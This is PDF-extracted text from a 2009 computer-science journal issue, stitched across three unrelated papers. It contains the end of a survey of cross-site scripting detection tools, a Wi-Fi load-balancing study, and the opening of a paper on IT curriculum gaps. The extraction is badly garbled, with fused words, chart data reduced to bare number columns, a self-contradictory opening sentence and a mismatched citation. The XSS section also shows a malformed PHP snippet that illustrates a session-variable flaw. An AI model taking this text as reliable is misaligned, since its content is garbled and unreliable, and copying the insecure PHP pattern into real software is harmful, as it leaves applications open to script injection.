The vulnerability of a server page is necessary conditionfor the vulnerability of web application, but it isn’t a necessarycondition [1]. That means protecting any single page from amalicious code never guarantees the protection of entire webapplication. Server page may send user data to other page or toany other persistent data store instead of client browser. Inthese situations, XSS may occur through another page. Mostof the existing systems don’t provide any procedure to handlethis difficulty. In the multi-module scenario, data may be passed from one module to another module using somesession variables and those session variables status are storedin cookies. Let’s see the above example. This below exampleis taken from [25].
In the above example, Fig. 13, we can see user input isstored into session variable and later it is stored into $namevariable. In Fig. 14, that session variable is echoed throughdifferent page. So, any filtering process on $name variablewill not effect to session variable. In this case, any maliciouscode can create XSS vector using session variable and can bypass any filtering process. Bisht, Venkatakrishnan and
Balzarotti, Cova, Felmetsger, Vigna solved Multi-module problem in their work [11, 25] but most of other tools are nothaving any technique to handle it.
123
4567891011121314151617
18192021222324
<HTML><HEAD>
<TITLE> Enter User Name: </TITLE>
</HEAD><BODY><? php
// connect to the existing session
session_start(); // create a session variable
session_register(“ses_var”);// set ses_var with php variable
$HTTP_SESSION_VARS[“ses_var”] = $nameif (isset($_POST[“user”])){
$name = addslashes($_POST[“user”]);exit;
}?>
<FORM action = “create.php” method = “POST”>UserName :<input name = “user” type = “text”><input name = “OK” type = “submit”>
</FORM></BODY></HTML>
Figure 13. Session variable problem- 1st page
123
<?phpecho $_SESSION [“ses_var”];
<?
Figure 14. Session variable problem-2nd
page
After reading source code files of LogiCampus EducationalPlatform [33], an open source web application to look out thementioned XSS holes, I found several holes. Number of different kinds of holes is given in Table II. For finding DOM- based XSS holes it was needed to look DOM modificationcode or code that is used to write on the client side web page.Any pattern using user defined data dynamically such as anyeventhandler or inline scripting code is tracked to analyze staticscript code problem. Multi-module problem is mainly occurred by session variable. So, I follow data flow using sessionvariables and this application used several session variables but before showing any user defined data to the client site this
application use filtering functions. So, none of those sessionvariables will create any multi-module problem for thisapplication.
TABLE II. XSS HOLES IN A PARTICULAR WEB APPLICATION
ApplicationName
PHPfiles
HTMLfiles
DOM -based
StaticScript
Multi -Module
LogiCampusEducational
Platform186 543 7 12 0
29 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 36/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
V. EVALUATION
Well known ten methodologies which were used to detectcross-site scripting and figure out their real looks with respectto my five problem categories is analyzed in this section. TableIII describes the capability of well-known tools to solve the problems which I have mentioned in my previous section.
The results of this analysis are made using my knowledge
which is acquired during my survey and some of them aremade on the basis of following papers’ comments on thosetools. The first column states the authors or researchers of existing tools. If any tool has Low status under any problemthen it is unable to solve this problem. On the other hand if anytool has High status under any problem then that tool is able toresolve the problem and in the case of Medium, tool may solvesome part of that problem. For instance, the method of Jim,Swamy, and Hicks [10] has Low status under Multi-module problem which states that the tool is not capable to solve multi-module problem. Table IV figures out the false positive rate of those tools and these results are made on the basis of their results and comments. Some results are made using following papers' comments on those tools. We can see in the Table IV
some results carry Not Identified that means, I couldn’tsummarize them. We can see in Table III, the method of Kirda,Kruegel, Vigna, and Jovanovic [13] has High status under all problems and it seems that it has capability to resolve all problems. But in Table IV we can find their method has Highstatus that states this tool generates more false positive which isa massive disadvantage of any tool. Another stated problem in previous section, “ Insecure Practice of JavaScript ” is not
included because we know DOM-based , and malicious codebetween static scripts are results of Insecure JavaScript practice. This is true; I don’t do any analysis using their tools practically because I don’t have. But I use their algorithms and procedures to make it possible. And I believe that this issufficient to provide real picture.
VI. CONCLUSION
This is my analysis report on most well-known injection problem, cross-site scripting. I didn’t implement or run anytools to experiment. I use their algorithms and procedures tounderstand, how they work and I summarize their successes aswell as limitations. I didn’t find any method that is 100% perfect. Even I am not presenting any tool that can detect XSS.I keep this task for my future movement. Web Application performs many critical tasks and deals with sensitiveinformation. In our daily life, we pass our so manyconfidential data through this media. So this platform must besecure and stable. Nowadays, web application facing security problem for these injection problem and XSS is one of them.Researchers are doing hard work to make our web application platform more reliable. This survey report will help them for their further research on this issue. I believe that this report provides summary of all the methodologies, used for detectingXSS and their limitations and success as well.
TABLE III. EXISTING METHODS’ CAPABILITY TO RESOLVE PROBLEMS
TABLE IV. FALSE POSITIVE RATE OF EXISTING METHODS
Authors False positive
Su, and Wassermann [2] Low
Minamide [5] Medium
Huang, Hang, Yu, Tsai, and Lee [6] HighJim, Swamy, and Hicks [10] Low
Jovanovic, Kruegel, and Kirda [12] Medium
Kirda, Kruegel, Vigna, and Jovanovic [13] High
Y. Huang, S. Huang, Lin, and Tsai [15] Not IdentifiedPietraszek, and Berghe [18] Medium
Huang, Hang, Tsai, Lee, and Kuo [28] Not IdentifiedWassermann, and Su [29] Medium
Authors Browser specific DOM - based Static Script Multi - Module
Su, and Wassermann [2] Low Low Low Low
Minamide [5] Low Low Low Low
Huang, Hang, Yu, Tsai, and Lee [6] Low Low Low LowJim, Swamy, and Hicks [10] High High High Low
Jovanovic, Kruegel, and Kirda [12] Low Low Low Low
Kirda, Kruegel, Vigna, and Jovanovic [13] High High High HighY. Huang, S. Huang, Lin, and Tsai [15] Low Low Low LowPietraszek, and Berghe [18] High Low High Low
Huang, Hang, Tsai, Lee, and Kuo [28] Low Low Low Low
Wassermann, and Su [29] Medium Low Low Low
30 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 37/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
R EFERENCES
[1] S. M. Metev, and V. P. Veiko, “Laser Assisted Microtechnology,” 2nded., R. M. Osgood, Jr., Ed. Berlin, Germany: Springer-Verlag, 1998.
[2] Z. Su and G. Wassermann, “The essence of command Injection Attacksin Web Applications,” In Proceeding of the 33rd Annual Symposium onPrinciples of Programming Languages , USA: ACM, January 2006, pp.372-382.
[3] C. Yue and H. Wang, “Charactering Insecure JavaScript Practice on the
Web,” In Proceedings of the 18th International Conference on the WorldWide Web, Madrid, Spain: ACM, April 20-24, 2005.
[4] Y. Xie, and A. Aiken, “Static detection of security vulnerabilities inscripting languages,” In Proceeding of the 15th USENIX SecuritySymposium , July 2006, pp. 179-192.
[5] Y. Minamide, “Static Approximation of Dynamically Generated WebPages,” In Proceedings of the 14th International Conference on the WorldWide Web , 2005, pp. 432-441.
[6] Y.-W. Huang, F. Yu, C. Hang, C. H. Tsai, D. Lee, and S.Y. Kuo,“Securing web application code by static analysis and runtime
protection,” In Proceedings of the 13th International World Wide WebConference, 2004.
[7] A.S. Christensen, A. Mǿller, and M.I. Schwartzbach, “Precise analysisof string expression,” In proceedings of the 10th international staticanalysis symposium, vol. 2694 of LNCS, Springer-Verlag, pp. 1-18.
[8] Wikipedia, http://wikipedia.org.
[9] V.B. Livshits, and M.S. Lam, “Finding security errors in Java programswith static analysis,” In proceedings of the 14th Usenix securitysymposium , August 2005, pp. 271-286.
[10] T. Jim, N. Swamy, and M. Hicks, “BEEP: Browser-Enforced EmbeddedPolicies,” In Proceedings of the 16th International World Wide WebConference, ACM, 2007, pp. 601-610.
[11] P. Bisht, and V.N. Venkatakrishnan, “XSS-GUARD: Precise dynamic prevention of Cross-Site Scripting Attacks,” In Proceeding of 5th
Conference on Detection of Intrusions and Malware & VulnerabilityAssessment, LNCS 5137, 2008, pp. 23-43.
[12] N. Jovanovic, C. Kruegel, and E. Kirda, “Pixy: A static analysis tool for detecting web application vulnerabilities (short paper),” In 2006 IEEESymposium on Security and Privacy, Oakland, CA: May 2006.
[13] E. Kirda, C. Kruegel, G. Vigna, and N. Jovanovic, “Noxes: A client-sidesolution for mitigating cross site scripting attacks,” In Proceedings of the
21st
ACM symposium on Applied computing , ACM, 2006, pp. 330-337.[14] Grossman, RSNAKE, PDP, Rager, and Fogie, “XSS Attacks: Cross-site
Scripting Exploits and Defense,” Syngress Publishing Inc, 2007.
[15] Y.-W. Huang, S.-K. Huang, T.-P. Lin, and C.-H. Tsai, “Web applicationsecurity assessment by fault injection and Behavior Monitoring,” InProceeding of the 12th international conference on World Wide Web ,ACM, New York, NY, USA: 2003, pp.148-159.
[16] A. Klein, “DOM Based Cross Site Scripting or XSS of the Third Kind,”http://www.webappsec.org/projects/articles/071105.html, July 2005.
[17] “OWASP Document for top 10 2007- cross Site Scripting,”http://www.owasp.org/index.php/Top_10_2007-Cross_Site_Scripting.
[18] T. Pietraszek, and C. V. Berghe, “Defending against Injection Attacksthrough Context-Sensitive String Evaluation,” In Proceeding of the 8th
International Symposium on Recent Advance in Intrusion Detection(RAID), September 2005.
[19] D. Balzarotti, M. Cova, V. Felmetsger, N.Jovanovic, E. Kirda, C.Kruegel, and G. Vigna, “Saner: Composing Static and DynamicAnalysis to Validate Sanitization in Web Applications,” In IEEEsymposium on Security and Privacy, 2008.
[20] “Web Application Security Assessment,” SPI Dynamics Whitepaper,SPI Dynamics, 2003.
[21] “Web Application Security Testing – AppScan 3.5,” Sanctum Inc.,http://www.sanctuminc.com.
[22] “JavaScript Security: Same origin,” Mozilla Foundation,http://www.mozilla.org/projects/security/components/same-origin.html,February 2006.
[23] “InterDo Version 3.0,” Kavado Whitepaper, Kavado Inc. , 2003.
[24] “AppShield,” Sanctum Inc. http://sanctuminc.com, 2005.
[25] D. Balzarotti, M. Cova, V. V. Felmetsger, and G. Vigna, “Multi-ModuleVulnerability Analysis of Web-based Applications,” In proceeding of 14th ACM Conference on Computer and Communications Security,Alexandria, Virginia, USA: October 2007.
[26] N. Jovanovic, C. Kruegel, and E. Kirda, “Precise alias analysis for syntactic detection of web application vulnerabilities,” In ACMSIGPLAN Workshop on Programming Languages and Analysis for security, Ottowa, Canada: June 2006.
[27] D. Scott, and R. Sharp, “Abstracting Application-Level Web Security,”In Proceeding 11th international World Wide Web Conference,Honolulu, Hawaii: 2002, pp. 396-407.
[28] Y.-W Huang, F. Yu, C. Hang, C. –H. Tsai, D. Lee, and S. –Y. Kuo.“Verifying Web Application using BoundedModel Checking,” InProceedings of the International Conference on Dependable Systems and
Networks, 2004.
[29] G. Wassermann, and Z. Su, “Static detection of cross-site Scriptingvulnerabilities,” In Proceeding of the 30th International Conference onSoftware Engineering, May 2008.
[30] S. Christey, “Vulnerability type distributions in CVE,”http://cwe.mitre.org/documents/vuln-trends.html, October 2006.
[31] H. Hosoya, B. C. Pierce, “Xduce: A typed xml processing language(preliminary report),” In Proceeding of the 3rd International Workshopon World Wide Web and Databases, Springer-Verlag, London, UK:2001, pp. 226—244.
[32] M. Mohri, M. Nederhof, “Regular approximation of context-freegrammars through transformation,” Robustness in Language and SpeechTechnology, 1996, pp. 231-238
[33] “LogiCampus Educational Platform,”http://sourceforge.net/projects/logicampus
[34] “Testing for DOM-based cross-site scripting (OWASP-DV-003),”http://www.owasp.org/index.php/Testing_for_DOM-
based_Cross_site_scripting_(OWASP-DV-003)
31 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 38/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.2, 2009
HAMDI Salah1
Computer Sciences Department
ISSAT of Sousse
Sousse, Tunisia1hamdisalah@yahoo.fr
Abstract — In IEEE 802.11, load balancing algorithms (LBA)
consider only the associated stations to balance the load of
the available access points (APs). However, although the APs
are balanced, it causes a bad situation if the AP has a lower
signal length (SNR) less than the neighbor APs. So, balancethe load and associate one mobile station to an access point
without care about the signal to noise ratio (SNR) of the AP
cause possibly an unforeseen QoS; such as the bit rate, the
end to end delay, the packet loss, … In this way, we study an
improvement load balancing algorithm with SNR integration
at the selection policy.
Keywords: IEEE 802.11, QoS, Load Balancing Algorithm,
Signal to Noise Ratio, MPEG-4
I. INTRODUCTION
At the time of communication process, one mobilestation selects always the near access point who gives themost excellent signal length among those of all availableAPs. However, the client number per AP increases, so thebit rate per client and the network performance decreases.In the different standards IEEE 802.11, the associationdecision of a mobile station to an access point is madeonly thanks to physique consideration without care aboutload of the APs. In fact, many access points will be moreloaded than the other neighbor APs and the quality of service decrease. In this way, many techniques andapproaches are proposed to resolve this problem of unbalanced load in IEEE 802.11. Usually, the approachespropose load balancing algorithms (LBA) to equilibrate
traffic between the different available Wi-Fi nodes. In this paper, we show an experimental analysis of
QoS and of load balancing algorithm in IEEE 802.11. Thepaper is organized as follows: in section 2, we outline theproblem of unbalanced load. In section 3, we show manydifferent approaches focalized about this problem. Insection 4, we address the limit of LBA. In section 5, wehave used an experimental platform (camera IPtransmitting video MPEG-4, APs, mobiles stations …) toapply the algorithm and to do many different experiencesin IEEE 802.11environment. We have applied LBAproposed in [4, 5, 8] and we have analyzed his efficiency.Section 6 presents our contribution to improve LBA.
Finally, section 7 concludes this work.
SOUDANI Adel2, TOURKI Rached
3
Laboratory of Electronic and Microelectronic
Sciences Faculty of Monastir
Monastir, Tunisia2adel.soudani@issatso.rnu.tn,
3rached.tourki@fsm.rnu.tn
II. PROBLEM OF UNBALANCED LOAD IN IEEE 802.11
When load balancing word is used in IEEE 802.11,load means the number of the active process per accesspoint and a load balancing mechanism attempt to make thesame number of active process per cell [10]. The standardIEEE 802.11 does not specify an automatic loaddistribution mechanism. In the hot spots who dispose of many distributed access points, one mobile station selectsalways an AP who gives the most excellent signal to noiseratio (SNR). The users search the near AP without careabout the traffic state of the selected AP. In fact, thisphenomenon causes a problem to wireless LAN who isnot dimensioned and many APs are managing severalmobiles more than the available neighbor APs. In thisway, upload an access point more than another AP causean unbalanced load problem. Figure 1 show that onemobile station who is moving between several APs do not
have QoS criterion to help it to choice one AP and notchoice another.
Fig. 1. Unbalanced load problem
Load balanced algorithm is applied in the intersectionzones of the different APs and one mobile station isattached from an access point to another.
III. PREVIOUS LOAD BALANCING APPROACHES
I. Papanikos and all in [2] indicate that load balancingpolicy is necessary to distribute the mobiles stationsbetween the different access points. They have proposedone load balancing procedure to attach one mobile station
to an AP and balance the user’s number per AP.
?
Experimental Performances Analysis of
Load Balancing Algorithms in IEEE 802.11
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 39/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.2, 2009
S. Sheu and all in [1] proposed Dynamic Load BalanceAlgorithm (DLBA) to distribute the WLAN usersaccording to the client number per AP.
[9] Proposed an algorithm to decrease congestion andbalance the user’s traffics in IEEE 802.11. Each accesspoint has one different AP channel to avoid congestionevent and signal interference problems. The algorithmfound the Most Congested Access Point (MCAP),
analyses the users association and decrease the congestionof MCAP. A user will not be connected to an AP with theresult that the Signal to Interference Ratio (SIR) isabsolute positive and the signal power is more than a fixedthreshold.
[7] Presented a Cell Breathing Technique to balancethe APs load and improve QoS of the real timeapplications. It reduces the signal length of the congestedAPs, so reduce the AP’s impact and user’s number percongested AP. On the other hand, it increase the signallength and the Impact of the under loaded APs. Soreattach the disconnected stations to the under loadedaccess point.
V. Aleo and all in [4, 5] proposed a load balancingalgorithm in hot spots. The algorithm works with careabout the bit rate per each AP. It does not think about theclient’s number per AP because the user’s traffic ischangeable. So, there are not a serious correlation betweenthe client’s number and their traffics. Over loaded accesspoints are not authorized to associate new coming stations.
IV. LOAD BALANCING ALGORITHM LIMITS
Wireless link characteristics are not constant and varyover time and place [6]. Load balancing algorithmsconsider only the associated stations to balance the load of the all APs. However, although the APs are balanced,it cause a bad situation if the AP’s associated stations is
having low signal length (SNR) less than the neighborAPs. Possibly, it will suffer the AP channel and increasethe number of loss packets. If IEEE 802.11 is notdimensioned correctly and the APs are distributedwrongly, so it’s impossible to apply load balancingalgorithm and improve the QoS [3]. Moreover, associate amobile station to an access point without consideration of the signal length (SNR) received from the AP, causepossibly an unforeseen QoS; such as the bit rate, the endto end delay, the packet loss, … On the other hand, anunder loaded access point but having low Signal to NoiseRatio (SNR) cannot improve QoS. In fact, before applyLBA and change one mobile station from an AP to
another, it’s very important to think about noise, signalsinterference, distance and geographic distribution of theavailable APs and so their signals levels. An access pointhaving low SNR must not consider at the time of LBAexecution. In this way, we search to show this contributionexperimentally. We use an experimental platform withcamera IP and many APs to analyze QoS of MPEG-4transmission via IEEE 802.11 and measure many differentparameters.
V. EXPERIMENTATIONS & RESULTS
A. Exp1 : insuffisance of SNR
This first experimentation has an object to analyze the
video MPEG-4 quality and measure many differentparameters of the QoS. We show the variation of bit rate,
end to end delay, jitter, loss … according to SNR and loadof the APs.
Fig. 2. Bit rate variation
Fig. 3. Frame end to end delay variation
Fig. 4. Frame jitter variation
0
100
200
300
400
500
600
20 30 40 50SNR (db)
Bit rate= f(SNR, Traffic)
480kbps
570kbps
2944kbps
12237kbps
0
50
100
150
200
250
300
350
20 30 40 50SNR (db)
Frame end to end delay=f(SNR, Traffic)
480kbps
570kbps
2944kbps
12237kbps
0
50
100
150
200
250
300
350
20 30 40 50SNR (db)
Frame jitter = f(SNR, Traffic)
480kbps
570kbps
2944kbps
12237kbps
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 40/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.2, 2009
Fig. 5. Frame rate variation
Fig. 6. PSNR variation
Figure 2 show the bit rate variation according to SNRand load. The bit rate varies proportionally to SNR.However, if AP’s load increase so the bit rate decreasealthough SNR is strong again ; for example, when thetraffic is equal to 12237 kbps and SNR = 50 db, the bitrate (243 kbps) is less than the value (550 kbps)measured when the traffic = 570 kbps although SNR isweak.
Figure 3 demonstrates that the delay does not varyproportionally to SNR. Although, SNR is strong (50 db)and traffic = 12237 kbps, the frame delay is more (333msec) than the value measured (59 msec) when the traffic= 480 kbps and SNR = 30 db.
As figure 4 shows, frame jitter does not varyproportionally to Signal to Noise Ratio. However, if anaccess point is uploaded so the jitter increases althoughSNR value is good. We have measured a very bad jitter(293 msec) when the traffic =12237 kbps and SNR=50 db.
On the other hand, we have measured good jitter (56msec) when the traffic = 480 kbps and SNR was medium(30 db).
In figure 5, we have measured the frame numberreceived per second according to (SNR) and the load of AP. If SNR is good so the frame rate increases. But therate decrease (3 fps) when the traffic = 12237 kbpsalthough SNR is good (50 db) because AP is uploaded.However, the rate was good (17 fps) when the traffic =480 kbps although SNR was medium (30 db).
Figure 6 demonstrates that video quality and so PSNRincrease according to the signal length. However, thetraffic of access point affects the video quality.
Basing on the previous figures and interpretations,QoS parameters are better if Signal to Noise Ratio isstrong. However, upload an AP decrease the QoSalthough SNR is good again. In fact, take care only aboutSNR and physiques criterion of channel is not sufficient toimprove QoS. We show experimentally the importance of the load at the variation of QoS parameters at the time of MPEG-4 transmission. We must considerer AP’s load atthe time of IEEE 802.11 connection.
B. Exp2: Performance analyze of LBA
The object of this second experience is to use againour platform (camera IP transmitting video MPEG-4, APs,mobiles stations …) and apply LBA between two accesspoints that are unbalanced. The standard IEEE 802.11does not distribute automatically the traffic of APs.Indeed, we apply LBA manually basing on the sum of traffics and we distribute one mobile station to balance theload of the two available access point.
Fig. 7. Bit rate variation
0
5
10
15
20
25
20 30 40 50SNR (db)
Frame rate= f(SNR, Traffic)
480kbps
570
kbps
2944kbps
12237kbps
0
20
40
60
80
100
120
20 30 40 50 60SNR (db)
PSNR = f(SNR, Traffic)
570kbps
815kbps
11657kbps
12611kbps
0
100
200
300
400
500
20 30 40 50 80SNR (db)
Bit rate= f(SNR, Load)
Unbalanced
APs
LBA
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 41/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.2, 2009
Fig. 8. Bit rate variation
Fig. 9. Bit rate variation
At the first hand, figures 7, 8 and 9 show the efficiencyof load balancing algorithm to enhance the bit rate of users. In figure 7, we have applied LBA at one signallength = 80 db so the rate increase from 317 kbps to 442kbps.
On the other hand, the bit rate decreases again whileSNR is weak. Although APs are balanced, we havemeasured 225 kbps who is less than the first valuemeasured when the APs were unbalanced (317 kbps). Thislast note is valid on figures 8 and 9. However, we balancethe APs at a signal length =SNR1, so the bit rate increase.But it decrease again at a weak signal length = SNR2 andwe have measured bad value who is less than the valuecalculated at SNR1.
Figures 7, 8 and 9 show a correlation between SNR1and SNR2; the bit rate decrease while SNR2 = SNR1/2although APs are balanced again (SNR2 = 40 db if SNR1= 80 db, SNR2 = 30 db if SNR1 = 60 db, SNR2 = 20 db if SNR1 = 40 db).
Fig. 10. Packet jitter variation
Fig. 11. Frame end to end delay variation
Fig. 12. Frame jitter variation
0
100
200
300400
500
600
700
20 30 40 50 60SNR (db)
Bit rate = f(SNR, Load)
UnbalancedAPs
LBA
0
100
200
300
400
500
600
700
20 30 40SNR (db)
Bit rate = f(SNR, Load)
Unbalanced
Aps
LBA
0
5
10
1520
25
30
35
40
20 30 40 50 80SNR (db)
Packet jitter = f(SNR, Load)
Unbalanced
ApsLBA
0
0,05
0,1
0,15
0,2
0,25
20 30 40 50 80
SNR (db)
Frame end to end delay =f(SNR, Load)
Unbalanced
Aps
LBA
0
50
100
150
200
250
20 30 40 50 80SNR (db)
Frame jitter = f(SNR, Load)
UnbalancedAps
LBA
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 42/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.2, 2009
Fig. 13. Frame jitter variation
Fig. 14. PSNR variation
In figure 10, we have applied LBA when signal tonoise ratio = 80 db. In fact, packet jitter decreasesfrom18ms to 13ms. However, the jitter increase againaccording to SNR (<=40 db) until 26 ms that is greaterthan the first value (18 ms) measured when APs areunbalanced.
As figure 11 shows, LBA application decreaseconsiderably frame end to end delay from 0.13 sec to0.096 sec. Although the access point are balanced, the endto end delay increase until 0.17 sec because SNR becameweak (SNR <= 40 db) than the first value (80 db).
In figure 12, LBA application improves the frame jitter. In fact, the jitter decreases from 131 ms until 96 ms.But looking at the value measured in figure 13 (176 ms)when SNR became weak (40 db), frame jitter is bad thanthe value calculated when SNR is strong (80 db) althoughAPs were unbalanced (131 ms).
Figure 14 demonstrates that LBA enhance video
quality of users. Figure 14 show that when SNR = 70 db,LBA application increases PSNR considerably. However,when signal length became medium = 30 db, video quality
became bad and so PSNR decrease (14 db) although APsare balanced.
On conclusion, the previous figures were anapplication of load balancing algorithm to study hisefficiency. Basing on the figures, LBA improve QoS andenhance their parameters (bit rate, jitter, end to end delay...). However, the stations are mobiles and signals lengths
vary from one mobile station to another. Indeed, LBAapplication is not absolutely the best solution to improvethe QoS. Quality of service decrease when SNR becameweak although the load is distributed correctly. So, weshow experimentally the importance of parameter SNR atthe time of LBA application. In fact, apply LBA andchange one mobile station from an uploaded AP to anunder loaded AP do not improve inevitably QoS. Thesecond AP must not have SNR who is less than the half of the first SNR.
VI. CONTRIBUTION TO LBA ENHANCEMENT
LBA show a limit between selection policy and
distribution policy. Selection policy select one mobilestation that will be disconnected from an uploaded AP andit will be connected to an under loaded AP. Then,distribution policy checks the load balancing criterion β and distributes the selected mobile. Indeed, selectionpolicy thinks without care about Signal to Noise Ratio(SNR) of the available under loaded and uploaded APs. Infact, an under loaded AP can have bad physique criterionand so weak SNR although it’s more available than theauthor APs. However, although APs are now balanced,QoS decrease when the new under loaded APs or theirassociated stations are far off than the old uploaded AP.So, it will suffer AP’s channel and have a very highprobability of packet loss. In this way, we try to improve
load balancing algorithm with integration of parameterSNR at the selection policy (figure 15).
Fig. 15. LBA enhancement
Our contribution to enhance LBA means the next: atthe time of LBA application, if LBA decide to disconnectone mobile from an AP and connect it to another, so it’snecessary to think with care about the SNR of the newAP. The new signal to noise ratio must not less than the
half of the SNR of the old AP although the new AP isunder loaded.
0
20
40
60
80
100
120
20 30 40SNR (db)
Frame jitter = f(SNR, Load)
Unbalanced
ApsLBA
0
20
40
60
80
100
120
30 70SNR (db)
PSNR = f(SNR, Load)
Unbalanced
Aps
LBA
NoIf next SNR >
current SNR / 2
Selection policy+
SNR calculation
Distribution policy
Yes
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 43/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.2, 2009
VII. CONCLUSION AND FUTURE WORKS
In this paper, we have proposed a contribution toimprove the QoS of video MPEG-4 transmission via IEEE802.11. In this way, we have used an experimentalplatform (camera IP, APs, mobiles…) to do twoexperiences. At the first hand, we have studied QoSparameters (bit rate, jitter, end to end delay…) variationaccording to SNR and load. On the other hand, we haveanalyzed the performances of load balancing algorithm inIEEE 802.11. These experiences allow us to found manyresults: firstly, QoS vary proportionally to signal to noiseratio SNR but load of APs affect QoS in IEEE 802.11.Secondly, LBA works more with taking care about SNRof the available APs. Finally, we have proposed a newapproach basing on SNR at the time of LBA execution.
The future works should be focus on the newapproaches and primitives that can be introduced toenhance the QoS. We will study the implementation of load balancing algorithm with SNR integration at theselection policy. In this way, we can use a network
simulator such as OPNET or NS to simulate and test thesestrategies.
REFERENCES
[1] S. Sheu, C. Wu, "Dynamic Load BalanceAlgorithm (DLBA) for IEEE 802.11 Wireless LAN”,Tamkang Journal of Sience and Engineering, Vol. 2 no 1,pp 45-52, 1999.[2] I. Papanikos, M. Logothetis, “A study ondynamic load balance for IEEE 802.11b wireless LAN”,8th International Conference on Advances inCommunication and Control, Greece, 2001.[3] A. Lindgren, A. Almquist, O. Schelen,“Evaluation of quality of service schemes for IEEE 802.11wireless LANs”, 26th Annual IEEE Conference on LocalComputer Networks (Tampa, Florida, USA), pp 348-351,2001.[4] V. Aleo, "Load Distribution in IEEE 802.11Cells", Master of Science Thesis, KTH, Royal Instiute of Technology, Allemagne, 2003.[5] H. Velayos, V. Aleo, and G. Karlsson, “LoadBalancing in Overlapping Wireless Cells”, IEEEInternational Conference on Communications, Paris,France, 2004.[6] Q. Ni, L. Romdhani, and T. Tureletti, “A Surveyof QoS Enhancements for IEEE 802.11 Wireless LAN”,
Journal of Wireless Communications and MobileComputing, Vol. 4, No. 5, pp. 547–566, 2004.[7] O. Brickley, S. Rea and D. Pesch, “Loadbalancing for QoS enhancement in IEEE802.11e WLANsusing cell breathing techniques”, 7th IFIP InternationalConference on Mobile and Wireless CommunicationsNetworks, Maroc, 2005.[8] M. SALHANI, T. DIVOUX, N.KROMMENACKER, “ Etude de l’Adéquation desRessources Physiques aux Besoins des Applications sans-fil: Proposition d’un algorithme d’équilibrage de chargedans les cellules IEEE 802.11“, Rapport de DEA en génieinformatique, Faculté des sciences et techniques, France,2005.
[9] H. Al-Rizzo, M. Haidar, R. Akl, Y. Chan,“Enhanced Channel Assignment and Load Distribution in
IEEE 802.11 WLANs”, IEEE International Conference onSignal Processing and Communications, pp 768-771,2007.[10] I. JABRI, N. KROMMENACKER, A.SOUDANI, T. DIVOUX, S. NASRI, “IEEE 802.11 LoadBalancing: An Approach for QoS Enhancement “,International Journal of Wireless Information Networks,Vol. 15 no 1, pp 16-30, 2008.
AUTHORS PROFILE
Salah HAMDI Received hisTeaching and Master degreesin computer sciences from theUpper Institute of the AppliedSciences and Technology(ISSAT) of Sousse, Tunisia.Currently, he is PhD studentin National EngineeringSchool of Sfax (ENIS),Tunisia. His current researchtopics concern the artificial
intelligence and the help to decision. He focuses on thedesign of intelligent software for the decision incardiology.
Adel SOUDANI received hisPhD (2003) in Electronics andalso Electrical Engineeringrespectively from the Universityof Monastir, Tunisia, and theUniversity of Henri PoincaréNancy I, France. He is currently
an Assistant Professor at theInstitute of Applied Sciencesand Technology of Sousse. Hisresearch activity includes QoSmanagement in real time
embedded systems and multimedia applications. Hefocuses mainly on protocol verification, implementationand performance evaluation for multi-constrainedcommunication systems.
Rached TOURKI receivedthe B.S. degree in Physics
(Electronics option) fromTunis University, in 1970; theM.S. and the Doctorat de 3emecycle in Electronics fromInstitut d'Electronique d'Orsay,Paris-south University in 1971and 1973 respectively. From1973 to 1974 he served asmicroelectronics engineer inThomson-CSF. He receivedthe Doctorat d'etat in Physics
from Nice University in 1979. Since that date, he hasbeen professor in Microelectronics and Microprocessorsin the department of physics at the Science Faculty of Monastir. From 1999, he is the Director of theElectronics & Microelectronics Lab.
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 44/215
AABBSSTTRRAACCTT This paper sets out to examine the skillsgaps between the industrial application of Information Technology and universityacademic programmes (curriculum). Itlooks at some of the causes, and considersthe probable solutions for bridging the gapbetween them and suggests the possibilitiesof exploring a new role for our universitiesand employers of labor. It also highlightsstrategies to abolish the misalignmentbetween university and industry. The mainconcept is to blend the academic rigidity
with the industrial relevance.
KEYWORDS
Skills gap, Industry, I.T, Curriculum,University, Graduates, government,business.
11..00 IINNTTRROODDUUCCTTIIOONN As the Nigerian industries are rapidlygrowing in terms of the advancement of science and technology, unprecedenteddemand for better graduates has beencreated. However, industry often criticizesthat existing university curricula fall shortto tackle the practical issues in theindustry. For instance, the industry expectsthe university to train their futureemployees with the latest technology.Academia is at the centre of developingtrends. This is because university lacks aproper academic programme that is
suitable for the industries. This causes agap between universities and industry thatneeds to be bridged by the universitiesacademics and IT professionals. Theindustry is continually broadening and theknowledge domain is increasingly becomingcomplex. The importance and role of developing better curriculum in universitiesprogramme is significant in bridging thegap between the changing technology andindustry needs for employers. Universities
should provide a conducive learningenvironment and industry orientedcurriculum that the business communityperceived as meeting their IT requirements.Curricula are expected to be developed withthe objective of producing skilled andemployable graduates. Ching et al (2000)states that employability rests in theknowledge and skills imparted upon themthrough their education.
